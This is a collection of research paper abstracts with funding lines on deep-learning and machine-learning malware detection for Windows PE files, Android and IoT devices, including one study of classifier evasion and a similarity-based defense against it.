文摘Over the past few years,Malware attacks have become more and more widespread,posing threats to digital assets throughout the world.Although numerous methods have been developed to detect malicious attacks,these malware detection techniques need to be more efficient in detecting new and progressively sophisticated variants of malware.Therefore,the development of more advanced and accurate techniques is necessary for malware detection.This paper introduces a comprehensive Dual-Channel Attention Deep Bidirectional Long Short-Term Memory(DCADBiLSTM)model for malware detection and riskmitigation.The Dual Channel Attention(DCA)mechanism improves themodel’s capability to concentrate on the features that aremost appropriate in the input data,which reduces the false favourable rates.The Bidirectional Long,Short-Term Memory framework helps capture crucial interdependence from past and future circumstances,which is essential for enhancing the model’s understanding of malware behaviour.As soon as malware is detected,the risk mitigation phase is implemented,which evaluates the severity of each threat and helps mitigate threats earlier.The outcomes of the method demonstrate better accuracy of 98.96%,which outperforms traditional models.It indicates the method detects and mitigates several kinds of malware threats,thereby providing a proactive defence mechanism against the emerging challenges in cybersecurity.
基金funded by Naif Arab University for Security Sciences under grant No.NAUSS-23-R11.
文摘In the current digital era,new technologies are becoming an essential part of our lives.Consequently,the number ofmalicious software ormalware attacks is rapidly growing.There is no doubt,themajority ofmalware attacks can be detected by most antivirus programs.However,such types of antivirus programs are one step behind malicious software.Due to these dilemmas,deep learning become popular in the detection and classification of malicious data.Therefore,researchers have significantly focused on finding solutions for malware attacks by analyzing malicious samples with the help of different techniques and models.In this research,we presented a lightweight attention-based novel deep Convolutional Neural Network(DNN-CNN)model for binary and multi-class malware classification,including benign,trojan horse,ransomware,and spyware.We applied the Principal Component Analysis(PCA)technique for feature extraction for binary classification.We used the Synthetic Minority Oversampling Technique(SMOTE)to handle the imbalanced data during multi-class classification.Our proposed attention-based malware detectionmodel is trained on the benchmarkmalware memory dataset named CIC-MalMem-2022.Theresults indicate that our model obtained high accuracy for binary and multi-class classification,99.5% and 97.9%,respectively.
基金supported and funded by the Deanship of Scientific Research at Imam Mohammad Ibn Saud Islamic University(IMSIU)(grant number IMSIU-DDRSP2504).
文摘The rapid evolution of malware presents a critical cybersecurity challenge,rendering traditional signature-based detection methods ineffective against novel variants.This growing threat affects individuals,organizations,and governments,highlighting the urgent need for robust malware detection mechanisms.Conventional machine learning-based approaches rely on static and dynamicmalware analysis and often struggle to detect previously unseen threats due to their dependency on predefined signatures.Although machine learning algorithms(MLAs)offer promising detection capabilities,their reliance on extensive feature engineering limits real-time applicability.Deep learning techniques mitigate this issue by automating feature extraction but may introduce computational overhead,affecting deployment efficiency.This research evaluates classical MLAs and deep learningmodels to enhance malware detection performance across diverse datasets.The proposed approach integrates a novel text and imagebased detection framework,employing an optimized Support Vector Machine(SVM)for textual data analysis and EfficientNet-B0 for image-based malware classification.Experimental analysis,conducted across multiple train-test splits over varying timescales,demonstrates 99.97%accuracy on textual datasets using SVM and 96.7%accuracy on image-based datasets with EfficientNet-B0,significantly improving zero-day malware detection.Furthermore,a comparative analysis with existing competitive techniques,such as Random Forest,XGBoost,and CNN-based(Convolutional Neural Network)classifiers,highlights the superior performance of the proposed model in terms of accuracy,efficiency,and robustness.
文摘The growing complexity of cyber threats requires innovative machine learning techniques,and image-based malware classification opens up new possibilities.Meanwhile,existing research has largely overlooked the impact of noise and obfuscation techniques commonly employed by malware authors to evade detection,and there is a critical gap in using noise simulation as a means of replicating real-world malware obfuscation techniques and adopting denoising framework to counteract these challenges.This study introduces an image denoising technique based on a U-Net combined with a GAN framework to address noise interference and obfuscation challenges in image-based malware analysis.The proposed methodology addresses existing classification limitations by introducing noise addition,which simulates obfuscated malware,and denoising strategies to restore robust image representations.To evaluate the approach,we used multiple CNN-based classifiers to assess noise resistance across architectures and datasets,measuring significant performance variation.Our denoising technique demonstrates remarkable performance improvements across two multi-class public datasets,MALIMG and BIG-15.For example,the MALIMG classification accuracy improved from 23.73%to 88.84%with denoising applied after Gaussian noise injection,demonstrating robustness.This approach contributes to improving malware detection by offering a robust framework for noise-resilient classification in noisy conditions.
文摘The growing threat of malware,particularly in the Portable Executable(PE)format,demands more effective methods for detection and classification.Machine learning-based approaches exhibit their potential but often neglect semantic segmentation of malware files that can improve classification performance.This research applies deep learning to malware detection,using Convolutional Neural Network(CNN)architectures adapted to work with semantically extracted data to classify malware into malware families.Starting from the Malconv model,this study introduces modifications to adapt it to multi-classification tasks and improve its performance.It proposes a new innovative method that focuses on byte extraction from Portable Executable(PE)malware files based on their semantic location,resulting in higher accuracy in malware classification than traditional methods using full-byte sequences.This novel approach evaluates the importance of each semantic segment to improve classification accuracy.The results revealed that the header segment of PE files provides the most valuable information for malware identification,outperforming the other sections,and achieving an average classification accuracy of 99.54%.The above reaffirms the effectiveness of the semantic segmentation approach and highlights the critical role header data plays in improving malware detection and classification accuracy.
基金funded by Institutional Fund Projects under grant no.(IFPDP-261-22)。
文摘Detecting cyber attacks in networks connected to the Internet of Things(IoT)is of utmost importance because of the growing vulnerabilities in the smart environment.Conventional models,such as Naive Bayes and support vector machine(SVM),as well as ensemble methods,such as Gradient Boosting and eXtreme gradient boosting(XGBoost),are often plagued by high computational costs,which makes it challenging for them to perform real-time detection.In this regard,we suggested an attack detection approach that integrates Visual Geometry Group 16(VGG16),Artificial Rabbits Optimizer(ARO),and Random Forest Model to increase detection accuracy and operational efficiency in Internet of Things(IoT)networks.In the suggested model,the extraction of features from malware pictures was accomplished with the help of VGG16.The prediction process is carried out by the random forest model using the extracted features from the VGG16.Additionally,ARO is used to improve the hyper-parameters of the random forest model of the random forest.With an accuracy of 96.36%,the suggested model outperforms the standard models in terms of accuracy,F1-score,precision,and recall.The comparative research highlights our strategy’s success,which improves performance while maintaining a lower computational cost.This method is ideal for real-time applications,but it is effective.
基金funded by the Deanship of Scientific Research at Princess Nourah bint Abdulrahman University,through the Research Funding Program,Grant No.(FRP-1443-15).
文摘The analysis of Android malware shows that this threat is constantly increasing and is a real threat to mobile devices since traditional approaches,such as signature-based detection,are no longer effective due to the continuously advancing level of sophistication.To resolve this problem,efficient and flexible malware detection tools are needed.This work examines the possibility of employing deep CNNs to detect Android malware by transforming network traffic into image data representations.Moreover,the dataset used in this study is the CIC-AndMal2017,which contains 20,000 instances of network traffic across five distinct malware categories:a.Trojan,b.Adware,c.Ransomware,d.Spyware,e.Worm.These network traffic features are then converted to image formats for deep learning,which is applied in a CNN framework,including the VGG16 pre-trained model.In addition,our approach yielded high performance,yielding an accuracy of 0.92,accuracy of 99.1%,precision of 98.2%,recall of 99.5%,and F1 score of 98.7%.Subsequent improvements to the classification model through changes within the VGG19 framework improved the classification rate to 99.25%.Through the results obtained,it is clear that CNNs are a very effective way to classify Android malware,providing greater accuracy than conventional techniques.The success of this approach also shows the applicability of deep learning in mobile security along with the direction for the future advancement of the real-time detection system and other deeper learning techniques to counter the increasing number of threats emerging in the future.
基金supported by Princess Nourah bint Abdulrahman University Researchers Supporting Project number(PNURSP2025R104)Princess Nourah bint Abdulrahman University,Riyadh,Saudi Arabia。
文摘In today’s digital world,the Internet of Things(IoT)plays an important role in both local and global economies due to its widespread adoption in different applications.This technology has the potential to offer several advantages over conventional technologies in the near future.However,the potential growth of this technology also attracts attention from hackers,which introduces new challenges for the research community that range from hardware and software security to user privacy and authentication.Therefore,we focus on a particular security concern that is associated with malware detection.The literature presents many countermeasures,but inconsistent results on identical datasets and algorithms raise concerns about model biases,training quality,and complexity.This highlights the need for an adaptive,real-time learning framework that can effectively mitigate malware threats in IoT applications.To address these challenges,(i)we propose an intelligent framework based on Two-step Deep Reinforcement Learning(TwStDRL)that is capable of learning and adapting in real-time to counter malware threats in IoT applications.This framework uses exploration and exploitation phenomena during both the training and testing phases by storing results in a replay memory.The stored knowledge allows the model to effectively navigate the environment and maximize cumulative rewards.(ii)To demonstrate the superiority of the TwStDRL framework,we implement and evaluate several machine learning algorithms for comparative analysis that include Support Vector Machines(SVM),Multi-Layer Perceptron,Random Forests,and k-means Clustering.The selection of these algorithms is driven by the inconsistent results reported in the literature,which create doubt about their robustness and reliability in real-world IoT deployments.(iii)Finally,we provide a comprehensive evaluation to justify why the TwStDRL framework outperforms them in mitigating security threats.During analysis,we noted that our proposed TwStDRL scheme achieves an average performance of 99.45%across accuracy,precision,recall,and F1-score,which is an absolute improvement of roughly 3%over the existing malware-detection models.
基金This work was funded by the Deanship of Graduate Studies and Scientific Research at Jouf University under Grant No.(DGSSR-2023-02-02178).
文摘The dominance of Android in the global mobile market and the open development characteristics of this platform have resulted in a significant increase in malware.These malicious applications have become a serious concern to the security of Android systems.To address this problem,researchers have proposed several machine-learning models to detect and classify Android malware based on analyzing features extracted from Android samples.However,most existing studies have focused on the classification task and overlooked the feature selection process,which is crucial to reduce the training time and maintain or improve the classification results.The current paper proposes a new Android malware detection and classification approach that identifies the most important features to improve classification performance and reduce training time.The proposed approach consists of two main steps.First,a feature selection method based on the Attention mechanism is used to select the most important features.Then,an optimized Light Gradient Boosting Machine(LightGBM)classifier is applied to classify the Android samples and identify the malware.The feature selection method proposed in this paper is to integrate an Attention layer into a multilayer perceptron neural network.The role of the Attention layer is to compute the weighted values of each feature based on its importance for the classification process.Experimental evaluation of the approach has shown that combining the Attention-based technique with an optimized classification algorithm for Android malware detection has improved the accuracy from 98.64%to 98.71%while reducing the training time from 80 to 28 s.
文摘Detecting malware on mobile devices using the Android operating system has become a critical challenge in the field of cybersecurity,in the context of the rapid increase in the number of malware variants and the frequency of attacks targeting Android devices.In this paper,we propose a novel intelligent computational method to enhance the effectiveness of Android malware detection models.The proposed method combines two main techniques:(1)constructing a malware behavior profile and(2)extracting features from the malware behavior profile using graph neural networks.Specifically,to effectively construct an Android malware behavior profile,this paper proposes an information enrichment technique for the function call graph of malware files,based on new graph-structured features and semantic features of the malware’s source code.Additionally,to extract significant features from the constructed behavior profile,the study proposes using the GraphSAGE graph neural network.With this novel intelligent computational method,a variety of significant features of the malware have been effectively represented,synthesized,and extracted.The approach to detecting Android malware proposed in this paper is a new study and has not been explored in previous research.The experimental results on a dataset of 40,819 Android software indicate that the proposed method performs well across all metrics,with particularly impressive accuracy and recall scores of 99.03%and 99.19%,respectively,which outperforms existing state-of-the-art methods.
基金The authors would like to thank Princess Nourah bint Abdulrahman University for funding this project through the researchers supporting project(PNURSP2024R435)and this research was funded by the Prince Sultan University,Riyadh,Saudi Arabia.
文摘The widespread adoption of Internet of Things(IoT)devices has resulted in notable progress in different fields,improving operational effectiveness while also raising concerns about privacy due to their vulnerability to virus attacks.Further,the study suggests using an advanced approach that utilizes machine learning,specifically the Wide Residual Network(WRN),to identify hidden malware in IoT systems.The research intends to improve privacy protection by accurately identifying malicious software that undermines the security of IoT devices,using the MalMemAnalysis dataset.Moreover,thorough experimentation provides evidence for the effectiveness of the WRN-based strategy,resulting in exceptional performance measures such as accuracy,precision,F1-score,and recall.The study of the test data demonstrates highly impressive results,with a multiclass accuracy surpassing 99.97%and a binary class accuracy beyond 99.98%.The results emphasize the strength and dependability of using advanced deep learning methods such as WRN for identifying hidden malware risks in IoT environments.Furthermore,a comparison examination with the current body of literature emphasizes the originality and efficacy of the suggested methodology.This research builds upon previous studies that have investigated several machine learning methods for detecting malware on IoT devices.However,it distinguishes itself by showcasing exceptional performance metrics and validating its findings through thorough experimentation with real-world datasets.Utilizing WRN offers benefits in managing the intricacies of malware detection,emphasizing its capacity to enhance the security of IoT ecosystems.To summarize,this work proposes an effective way to address privacy concerns on IoT devices by utilizing advanced machine learning methods.The research provides useful insights into the changing landscape of IoT cybersecurity by emphasizing methodological rigor and conducting comparative performance analysis.Future research could focus on enhancing the recommended approach by adding more datasets and leveraging real-time monitoring capabilities to strengthen IoT devices’defenses against new cybersecurity threats.
文摘Despite only being around for a few years, mobile devices have steadily risen to become the most extensively used computer devices. Given the number of people who rely on smartphones, which can install third-party apps, it has become an increasingly important issue for end-users and service providers to ensure that both the devices and the underlying network are secure. People will become more reliant on applications such as SMS, MMS, Internet Access, Online Transactions, and so on due to such features and capabilities. Thousands of devices ranging from low-cost phones to high-end luxury phones are powered by the Android operating system, which has dominated the smartphone marketplace. It is about making it possible for people from all socioeconomic backgrounds to get and use mobile devices in their daily activities. In response to this growing popularity, the number of new applications introduced to the Android market has skyrocketed. The recent appearance of a wide range of mobile malware has caught the attention of security professionals and scholars alike. In light of the ongoing expansion of the mobile phone industry, the likelihood of it being used in criminal activities will only continue to rise in the future. This article reviews the literature on malware detection and prevention in Android mobile devices, analyzes the existing literature on major studies and tasks, and covers articles, journals, and digital resources such as Internet security publications, scientific studies, and conferences.
基金Princess Nourah bint Abdulrahman University and Researchers Supporting Project Number(PNURSP2024R346)Princess Nourah bint Abdulrahman University,Riyadh,Saudi Arabia.
文摘The growing usage of Android smartphones has led to a significant rise in incidents of Android malware andprivacy breaches.This escalating security concern necessitates the development of advanced technologies capableof automatically detecting andmitigatingmalicious activities in Android applications(apps).Such technologies arecrucial for safeguarding user data and maintaining the integrity of mobile devices in an increasingly digital world.Current methods employed to detect sensitive data leaks in Android apps are hampered by two major limitationsthey require substantial computational resources and are prone to a high frequency of false positives.This meansthat while attempting to identify security breaches,these methods often consume considerable processing powerand mistakenly flag benign activities as malicious,leading to inefficiencies and reduced reliability in malwaredetection.The proposed approach includes a data preprocessing step that removes duplicate samples,managesunbalanced datasets,corrects inconsistencies,and imputes missing values to ensure data accuracy.The Minimaxmethod is then used to normalize numerical data,followed by feature vector extraction using the Gain ratio andChi-squared test to identify and extract the most significant characteristics using an appropriate prediction model.This study focuses on extracting a subset of attributes best suited for the task and recommending a predictivemodel based on domain expert opinion.The proposed method is evaluated using Drebin and TUANDROMDdatasets containing 15,036 and 4,464 benign and malicious samples,respectively.The empirical result shows thatthe RandomForest(RF)and Support VectorMachine(SVC)classifiers achieved impressive accuracy rates of 98.9%and 98.8%,respectively,in detecting unknown Androidmalware.A sensitivity analysis experiment was also carriedout on all three ML-based classifiers based on MAE,MSE,R2,and sensitivity parameters,resulting in a flawlessperformance for both datasets.This approach has substantial potential for real-world applications and can serve asa valuable tool for preventing the spread of Androidmalware and enhancing mobile device security.
文摘With the ever-increasing continuous adoption of Industrial Internet of Things(IoT)technologies,security concerns have grown exponentially,especially regarding securing critical infrastructures.This is primarily due to the potential for backdoors to provide unauthorized access,disrupt operations,and compromise sensitive data.Backdoors pose a significant threat to the integrity and security of Industrial IoT setups by exploiting vulnerabilities and bypassing standard authentication processes.Hence its detection becomes of paramount importance.This paper not only investigates the capabilities of Machine Learning(ML)models in identifying backdoor malware but also evaluates the impact of balancing the dataset via resampling techniques,including Synthetic Minority Oversampling Technique(SMOTE),Synthetic Data Vault(SDV),and Conditional Tabular Generative Adversarial Network(CTGAN),and feature reduction such as Pearson correlation coefficient,on the performance of the ML models.Experimental evaluation on the CCCS-CIC-AndMal-2020 dataset demonstrates that the Random Forest(RF)classifier generated an optimal model with 99.98%accuracy when using a balanced dataset created by SMOTE.Additionally,the training and testing time was reduced by approximately 50%when switching from the full feature set to a reduced feature set,without significant performance loss.
基金supported by Institute of Information&Communications Technology Planning&Evaluation(IITP)Grant funded by the Korea government,Ministry of Science and ICT(MSIT)(No.2017-0-00168,Automatic Deep Malware Analysis Technology for Cyber Threat Intelligence).
文摘Antivirus vendors and the research community employ Machine Learning(ML)or Deep Learning(DL)-based static analysis techniques for efficient identification of new threats,given the continual emergence of novel malware variants.On the other hand,numerous researchers have reported that Adversarial Examples(AEs),generated by manipulating previously detected malware,can successfully evade ML/DL-based classifiers.Commercial antivirus systems,in particular,have been identified as vulnerable to such AEs.This paper firstly focuses on conducting black-box attacks to circumvent ML/DL-based malware classifiers.Our attack method utilizes seven different perturbations,including Overlay Append,Section Append,and Break Checksum,capitalizing on the ambiguities present in the PE format,as previously employed in evasion attack research.By directly applying the perturbation techniques to PE binaries,our attack method eliminates the need to grapple with the problem-feature space dilemma,a persistent challenge in many evasion attack studies.Being a black-box attack,our method can generate AEs that successfully evade both DL-based and ML-based classifiers.Also,AEs generated by the attack method retain their executability and malicious behavior,eliminating the need for functionality verification.Through thorogh evaluations,we confirmed that the attack method achieves an evasion rate of 65.6%against well-known ML-based malware detectors and can reach a remarkable 99%evasion rate against well-known DL-based malware detectors.Furthermore,our AEs demonstrated the capability to bypass detection by 17%of vendors out of the 64 on VirusTotal(VT).In addition,we propose a defensive approach that utilizes Trend Locality Sensitive Hashing(TLSH)to construct a similarity-based defense model.Through several experiments on the approach,we verified that our defense model can effectively counter AEs generated by the perturbation techniques.In conclusion,our defense model alleviates the limitation of the most promising defense method,adversarial training,which is only effective against the AEs that are included in the training classifiers.
